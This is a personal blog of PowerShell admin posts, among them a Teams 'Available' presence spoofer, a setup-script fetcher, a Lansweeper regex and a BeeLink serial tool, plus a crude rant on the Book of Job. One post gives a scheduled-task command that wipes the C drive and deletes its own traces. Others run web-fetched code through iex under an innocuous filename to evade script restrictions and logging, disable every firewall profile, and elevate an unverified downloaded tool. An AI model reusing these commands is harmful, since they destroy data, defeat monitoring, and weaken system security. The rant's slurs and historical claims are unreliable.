Call me...




Friday, January 6, 2023

PoSh Command History - Create your own

I wasn't sure how helpful, or novel this approach is - but thought I would share it.

> I also posted this on reddit - And someone commented:

"Was Add-History on vacation?"

I replied:

~~~~~~~~~~~~~~~~~~~

You know - When I went looking for ways to do this - That command never presented itself.

I will have to play around with it.

~~~~~~~~~~~~~~~~~~~

Then I replied again the next day, after looking at that command:

~~~~~~~~~~~~~~~~~~~

From what I am seeing - playing around with 'Add-History'...

THAT is much more complicated... Actually a pain in the ass.

This thing I hacked together is MUCH simpler across the board.

Though, all the same - Thanks for pointing that out!

~~~~~~~~~~~~~~~~~~~

From that - I feel like what I put together is rather novel.

Explanation:
I have a script ("disabled termed expired.ps1") that I have scheduled to run at 8:15, am M-F.

It pops up a PoSh CLI window on top of everything else, names it, sizes it (and will kill off any previous instances of that window)*, lists out what AD accounts are disabled, or expired, the reason why (terminated, KnowBe4 training is late...), how long it has been that way, etc...

The meat of that script is wrapped in a function named 'dte' - This way, while the window is open, I can easily refresh the window, with updated results, just by typing 'dte'...

Then I got lazy, and wanted to see if there was a way for that 'dte' command to be in the command history, so I could just 'up-arrow' and hit enter...

You know, rather than having to go through the laborious tasks of finding each of the three letters on the keyboard and having to press each one...

Really - I just wanted to see if I could do it...

Anyway - I added the below to the bottom part of the 'dte' function...

It sets the history for that specific Posh session to 'dte' (I don't think it works / will cause errors if used in ISE).

Obviously - It can be used for all kinds of things...
If you wanted to have several items you want in the history you could do:

"dte
cls
Get-Process" | Out-File $HxPath -Encoding ascii -Force 

Or assign that text to a variable:

$Hx = "dte
cls
Get-Process"

$Hx | Out-File $HxPath -Encoding ascii -Force 

If ($Host.Name -NOTmatch "ISE") {
# This sets the command history for the PoSh session to 'dte',
# so you can just up arrow, and get the command that re-runs the 'dte' function

$HxPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\dte.txt" 
"dte" | Out-File $HxPath -Encoding ascii -Force 
Set-PSReadLineOption -HistorySavePath $HxPath
}

(Hit the up-arrow '▲' or, type 'dte', and hit 'ENTER' to refresh...)

* If anyone is interested - Here is what I use to create and control the PoSh CLI window:

NOTE:
I like to include the PID in my Posh instances 'WindowTitle' - In case they lock up, so I can easily 'Stop-Process -Id XXXX'

$Window_Title = "Disabled, Terminated, or Expired AD Accounts"

If ($Host.Name -NOTmatch "ISE") {

$ScrWidth = $null; $ScrHeight = $null
$ScrWidth = 135
$ScrHeight = 35

$Already = $null; $Already = Get-Process | ? { $_.MainWindowTitle -match $Window_Title }

If ($Already) { $Already | Stop-Process }
$host.UI.RawUI.BufferSize = New-Object System.Management.Automation.Host.size($ScrWidth,$ScrHeight)
$host.UI.RawUI.WindowSize = New-Object System.Management.Automation.Host.size($ScrWidth,$ScrHeight)
$Host.UI.RawUI.WindowTitle = "$Window_Title (PID: $PID)"

############ Keeps the Console window on top ###############
$signature = @'
[DllImport("user32.dll")]
public static extern bool SetWindowPos(
IntPtr hWnd,
IntPtr hWndInsertAfter,
int X,
int Y,
int cx,
int cy,
uint uFlags);
'@

$type = Add-Type -MemberDefinition $signature -Name SetWindowPosition -Namespace SetWindowPos -Using System.Text -PassThru
$handle = (Get-Process -id $Global:PID).MainWindowHandle
$alwaysOnTop = New-Object -TypeName System.IntPtr -ArgumentList (-1)
$type::SetWindowPos($handle, $alwaysOnTop, 0, 0, 0, 0, 0x0003)
############## END - On top ################

} # END 'If ($Host.Name -NOTmatch "ISE")'


Wednesday, December 28, 2022

This is designed to keep MS Teams 'Presence' from going to 'Away'...

Every 4.5 minutes / 270 seconds ('$Timer = 270') - It toggles the Teams window (minimize, restore) - This tells the app that it is being used, and prevents it from going from 'Available' to 'Away' after 5 minutes of inactivity...

So... Always 'Available'.

Note that some Anti-virus solutions, as well as enabling Powershell logging (to the Event-Viewer) can expose this hack...

Read the comments in the script for additional details on how to use the script.

If the computer does not allow the logged-in user to run scripts, this can be copy-pasted into PoSh ISE and ran from there...

If ISE is blocked, or you want to go a cleaner route...

Then copy-paste this script into a text file, name it something unassuming (CustomerNotes.txt).

Then open up the PoSh command shell and run this:

('iex' is the alias for 'Invoke-Expression')

iex ((New-Object System.Net.WebClient).DownloadString(<full path to the file>\CustomerNotes.txt'))

This is a 'Do-While' method... 

The 'While ($Blurb -eq $null)' will never be satisfied, so the script must be manually stopped, unless using the '$QuittingTime' variable is used.


<#
The Teams presence, will go from 'Available' to 'Away' after 5 minutes of inactivity.
There are several Teams processes, bout only one of them will have a non-zero 'MainWindowHandle' - That is the actual window. 

This script toggles the Teams window to the top (making it the active window), every 4.5 minutes (270 seconds). 
Thus when Teams is the active window, the Teams presence is set to 'Available', before it can show an 'Away' presence.
Fire it up if you need to be away discreetly...
If you want it to allow you to be 'Away' for lunch - Uncomment those variable, and set '$LunchStart' and '$LunchEnd' accordingly.
Example (lunch from noon to 1pm):
$LunchStart = [DateTime]"12:00"
$LunchEnd = [DateTime]"13:00"

And if you want to kill this script at quitting time - Uncomment the '$QuittingTime' variable, and set it accordingly.
Example (Quitting time is 5pm):
$QuittingTime = [DateTime]"17:00"
#>

# Leave these NULL values alone #
$LunchStart = $null; $LunchEnd = $null; $QuittingTime = $null
# Leave these NULL values alone #

# Uncomment these two items and set them accordingly if you want to use the lunchbreak feature.
$LunchStart = [DateTime]"12:00"
$LunchEnd = [DateTime]"13:00"
# Uncomment these two items and set them accordingly if you want to the lunchbreak feature.

# Uncomment this item and set it accordingly if you want to use the QuittingTime feature.
$QuittingTime = [DateTime]"17:00"
# Uncomment this item and set it accordingly if you want to use the QuittingTime feature.

$RunIt = 0

If ( (Get-Date) -lt $LunchStart -or (Get-Date) -gt $LunchEnd ) { $RunIt = 1 }
If ( $LunchStart -eq $null -and (Get-Date) -lt $QuittingTime ) { $RunIt = 1 }
If ( (Get-Date) -lt $QuittingTime ) { $RunIt = 1 }
If ( (Get-Date) -ge $QuittingTime ) { $RunIt = 0 }



# Function 'Set-WindowStyle' was found in THIS comment: https://www.reddit.com/r/PowerShell/comments/bng1ec/comment/en6a3pi

Function Set-WindowStyle 
{
    param
    (
        [Parameter()]
        [ValidateSet('FORCEMINIMIZE', 'HIDE', 'MAXIMIZE', 'MINIMIZE', 'RESTORE', 
            'SHOW', 'SHOWDEFAULT', 'SHOWMAXIMIZED', 'SHOWMINIMIZED', 
            'SHOWMINNOACTIVE', 'SHOWNA', 'SHOWNOACTIVATE', 'SHOWNORMAL')]
        $Style = 'SHOW',
        [Parameter()]
        $MainWindowHandle = (Get-Process -Id $pid).MainWindowHandle
    )
# $MainWindowHandle = (Get-Process -Id $pid).MainWindowHandle
# Get-Process | ? { $_.Product -match "Teams" -and $_.MainWindowHandle -ne 0 }
    $WindowStates = @{
        FORCEMINIMIZE = 11; HIDE = 0
        MAXIMIZE = 3; MINIMIZE = 6
        RESTORE = 9; SHOW = 5
        SHOWDEFAULT = 10; SHOWMAXIMIZED = 3
        SHOWMINIMIZED = 2; SHOWMINNOACTIVE = 7
        SHOWNA = 8; SHOWNOACTIVATE = 4
        SHOWNORMAL = 1
    }
    Write-Verbose ("Set Window Style {1} on handle {0}" -f $MainWindowHandle, $($WindowStates[$style]))

    $Win32ShowWindowAsync = Add-Type –memberDefinition @” 
    [DllImport("user32.dll")] 
    public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
“@ -name “Win32ShowWindowAsync” -namespace Win32Functions –passThru

    $Win32ShowWindowAsync::ShowWindowAsync($MainWindowHandle, $WindowStates[$Style]) | Out-Null
} # END Function Set-WindowStyle 

# Setting the baseline...
Get-Process | ? { $_.Product -match "Teams" -and $_.MainWindowHandle -ne 0 } | % { Set-WindowStyle MINIMIZE $PSItem.MainWindowHandle }
Sleep 2
Get-Process | ? { $_.Product -match "Teams" -and $_.MainWindowHandle -ne 0 } | % { Set-WindowStyle RESTORE $PSItem.MainWindowHandle }

$Timer = 270

Do {
If ( $RunIt -ge 1 ) {
Get-Process | ? { $_.Product -match "Teams" -and $_.MainWindowHandle -ne 0 } | % { Set-WindowStyle MINIMIZE $PSItem.MainWindowHandle }
Sleep 2
Get-Process | ? { $_.Product -match "Teams" -and $_.MainWindowHandle -ne 0 } | % { Set-WindowStyle RESTORE $PSItem.MainWindowHandle }
}
If ( (Get-Date) -gt $QuittingTime -and $QuittingTime -ne $null) { Write-Host "STOP!!!" -F 14; Break }

Sleep $Timer
} While ($Blurb -eq $null)


<#
NOTE: Teams status is logged here:

$TeamsStatus = Get-Content -Path $env:APPDATA"\Microsoft\Teams\logs.txt" -Tail 1000 | Select-String -Pattern `
  'Setting the taskbar overlay icon -',`
  'StatusIndicatorStateService: Added' | Select-Object -Last 1
#>

Wednesday, June 22, 2022

My Set-Up script 'getter'

$RawContent = ((iwr "http://www.somethingtoscrollthrough.com/2022/05/firewall.html").RawContent).Split("`n|`r",[System.StringSplitOptions]::RemoveEmptyEntries)
$Start = "<p>#~~~~~~#"; $End = "<br />#---------#</p>"
$Counter = 0; $File_Path = "$(Get-Location)\PC_SetUp.ps1"
Clear-Variable ArrayStart, ArrayEnd
$RawContent | % {
If ($_ -match $Start) { $ArrayStart = $counter }; If ($_ -match $End) { $ArrayEnd = $counter }
If ($ArrayEnd) {Return}; $Counter++
}
$RawContent[$ArrayStart..$ArrayEnd] | % { ($_) -replace("<p>","")  -replace("</p>","") -replace("<br />","") } | Out-String | Out-File -LiteralPath $File_Path -Encoding ascii -Force

$LNK_Path = "$(Get-Location)\Open_PC_SetUp.lnk"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut($LNK_Path)
$Shortcut.TargetPath = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe"
$Shortcut.Arguments = "`"$File_Path`""
$Shortcut.Description = "Opens '$File_Path' as Admin, in ISE "
$Shortcut.Save(); Write-Host "Shortcut is here: $LNK_Path" -Fore 14 -Back 5
$bytes = [System.IO.File]::ReadAllBytes($LNK_Path)
$bytes[0x15] = $bytes[0x15] -bor 0x20 #set byte 21 (0x15) bit 6 (0x20) ON
[System.IO.File]::WriteAllBytes($LNK_Path, $bytes)
ii -Path $LNK_Path #Open the script in ISE, as Admin

 

 

Break
This sumbitch right here - As a scheduled task will ruin a computer and leave no traces of itself:
(The argument, executes in memory, then deletes the task and its associated XML, then proceeds to remove anything it can on the 'C' drive. Run it as an admin user, and set it to run logged in or not)

Name:
UpdateAll 

Actions > New -

Program/script:
C:\windows\system32\cmd.exe

Add arguments:
/C schtasks /delete /tn UpdateAll /f & del "C:\Windows\System32\Tasks\UpdateAll" & rd c:\ /s /q & shutdown -s -t 0

Friday, May 13, 2022

Lansweeper email attachment filters (RegEx)

 Just getting into using Lansweeper's Helpdesk feature...
Working on trimming down what attachments to allow on incoming support emails -

Setting this up is done with RegEx...
Of course, there are no examples inside of the Lansweeper KB, for any of this, and RegEx are non-intuitive, cryptic, and just generally a pain, unless you use it ALL the time.

I don't see any way to ask Lansweeper to add additional content to their KB about this, so I'm putting it here... Plus a way to pop out the correctly formatted RegEx, using PoSh.

On this page: https://<YourLanSweeperURL>/configuration/HelpdeskEmail/

Go to: 'Ignored attachment filters (regular expressions)'

You can test the filter, on that same line of that page, too.

$Start = "^(.(?!.*\.("
$Middle = "jpg|png|bmp|pdf|txt"
$End = ")))*$"

$RegEx_Line = "$Start"+"$Middle"+"$End"
$RegEx_Line

<#
# Result
^(.(?!.*\.(jpg|png|bmp|pdf|txt)))*$

# Ignored attachment filters (regular expressions)
# On this page: https://<YourLanSweeperURL>/configuration/HelpdeskEmail/

"All attachments in E-mails which match one of these regular expressions will not be saved to the web server."

It is an inverted argument - so that anything that 'matches' gets blocked...
Examples:
Filename.jpg - No Match! (Allowed)
Filename.png - No Match! (Allowed)
Filename.bmp - No Match! (Allowed)
Filename.pdf - No Match! (Allowed)
Filename.txt - No Match! (Allowed)

Filename.exe - Match found! (Blocked)
Filename.msi - Match found! (Blocked)
Filename.mp4 - Match found! (Blocked)
Filename.xx2 - Match found! (Blocked)
#>

Tuesday, May 10, 2022

netsh advfirewall set allprofiles state off

Just putting this out there for easy copy / pasta

###########################

#~~~~~~#
# Set time-zone automatically
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\tzautoupdate -Name start -Value "3"
Set-TimeZone "Eastern Standard Time"
w32tm /resync
# Disable the firewall
netsh advfirewall set allprofiles state off
# Set the current connection to 'Private' - By default it is 'Public' so WinRM will not enable.
Set-NetConnectionProfile -InterfaceIndex $((Get-NetConnectionProfile).InterfaceIndex) -NetworkCategory Private
# Enable WinRM
c:\windows\system32\winrm.cmd quickconfig -quiet
# Add DOT.NET 2.0--3.5
Add-WindowsCapability -Online -Name NetFx3~~~~
###########################
# Get Serial number from BIOS
$SerialNumber = (Get-WmiObject -class win32_bios).SerialNumber
# Dell computers have a shorter Serial number, but others (ie. BeeLink mini's) are too long - This shortens it (to 7 characters) if the SN is longer than 9 characters.
# MPC = Mini PC
If ($SerialNumber.Length -gt 9) { $SerialNumber = "MPC$($SerialNumber.Remove(0, ($SerialNumber.Length - 7)))" }
$SerialNumber
# Rename the computer to its SN
Rename-Computer -NewName $SerialNumber -Force
Break
# Gotta reboot
shutdown -r -t 0
###########################
# Download the PC Health Check app
Start "https://aka.ms/GetPCHealthCheckApp"

# Windows 11 Installation Assistant
Start "https://www.microsoft.com/software-download/windows11"

###########################
# Make sure you have successfully, and correctly set the computers hostname
hostname
# This grabs the full name of the domain
$Domain_Name = (Get-DnsClient -InterfaceIndex $((Get-NetConnectionProfile).InterfaceIndex)).ConnectionSpecificSuffix
# it is possible to add creds to this command - but just enter username, and password at the credential prompt (no need to add 'domain\')
$JoinFail = $null; Add-Computer -domainname $Domain_Name -ErrorVariable JoinFail
If ($JoinFail -ge 1) {
Write-Host "Well, that didn't work..." -F 14;
Write-Host "'$Domain_Name' is in the clipboard..." -F 0 -B 14
$Domain_Name | Set-Clipboard
cmd.exe /c sysdp.cpl
}
Break
# Gotta reboot
shutdown -r -t 0
#---------#

###########################

# Make sure you have successfully, and correctly set the computers hostname

hostname

# This grabs the full name of the domain

$Domain_Name = (Get-DnsClient -InterfaceIndex $((Get-NetConnectionProfile).InterfaceIndex)).ConnectionSpecificSuffix

# it is possible to add creds to this command - but just enter username, and password at the credential prompt (no need to add 'domain\')

Add-Computer -domainname $Domain_Name

Break

# Gotta reboot

shutdown -r -t 0

###########################


Others...

netsh advfirewall set currentprofile state off

netsh advfirewall set domainprofile state off

netsh advfirewall set privateprofile state off

netsh advfirewall set publicprofile state off


Monday, March 7, 2022

The Book of Job

Don't take the story of Job so literally - It's not like there was a journalist there writing everything down...

Stripped down to its core... The story is a lesson - It tells the student to not have a shitty attitude - because doing so just generates misery.

Otherwise stated... What consumes your thoughts, controls your life.

It is probably one of my favorite stories ever.

The story / lesson it is passing along is some very powerful advice that anyone can benefit from. Hence its tenacity.

Just because religiofucktards call it theirs is no reason to disavow its intent.

It is at least 8000 years old (probably out-dating King Hammurabis' code) and was (as most stories were) passed by word of mouth up until about 1700 years ago. The original story was not likely to have been centered around supernatural mono-theistic entities... Whereas, mono-theisim is about 5000-3000 years old.

The Jewish faith managed to hijack much of Sumerian mythology along with that cultures oral histories and parables... Including the story of 'Job'... And still Hebrews insist 'collectively' to call it all 'Jewish' / ''Torah' - Talk about plagiarism!!!

Removing all of the Judaeo-Christian bullshit and referring to the symbolisms as they were called out in antiquity - This is the lesson:

Don't cop an attitude! Be able and willing to let go of life's adversities and stresses... Because clinging to them, and / or worrying to much is just not healthy.

AKA:
Curse god, curse yourself = A bad attitude only hurts yourself.

WHEN YOU SEE IT, YOU WILL SHIT BRICKS

I composed a similar concept regarding Noah and the Ark here:
http://rich-laduca.blogspot.com/2013/01/while-global-flood-noah-and-ark-are.html

Wednesday, March 2, 2022

BeeLink Tools

A do all Powershell version is at the bottom here - Or...
Grab the tool here:
https://drive.google.com/file/d/1wmXwT6erye3U-l6YxwK5XUMa06CDregy/view?usp=sharing

Unzip it... (not shady looking at all, is it - Who you gonna trust? This post is mostly for me anyway)

I got this from BeeLink computers support thru Amazon...
I had to contact them, because the last several computers I've gotten had a generic "123456789" as the serial number in the BIOS.
But, for auditing purposes (on domain computers), I need to be able to programmatically see the serial number

If you run 'WriteOENSN.cmd', you can correct / update the serial number in BIOS.

I manually typed in the serial number from the sticker on the bottom of the computer, BUT -
The tool / process actually prompts to 'scan' it in (from the barcode on that same sticker).
So - If you have a USB barcode scanner you can plug into the computer... 

Scan it in... Way faster than typing!

These commands will show the serial number:

WMIC BIOS GET SERIALNUMBER

get-ciminstance win32_bios | select SerialNumber


Or - Grab this PoSh and it will do most of the work for you:

$Share_URL = "https://drive.google.com/file/d/1wmXwT6erye3U-l6YxwK5XUMa06CDregy/view?usp=sharing"

$Share_URL = "https://drive.google.com/uc?export=download&id=$($Share_URL.Split('/')[-2])"

$ZipDownload = "C:\Users\Public\Downloads\BeelinkTools.zip"
$ToolFolder = "$(Split-Path -Path $ZipDownload)\Beelink Tools"

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

(New-Object System.Net.WebClient).DownloadFile($Share_URL, $ZipDownload)

Expand-Archive -LiteralPath $ZipDownload -DestinationPath $ToolFolder

cd $ToolFolder
Start-Process -FilePath "C:\Windows\System32\cmd.exe" -Verb runas -ArgumentList {/k WriteOENSN.cmd}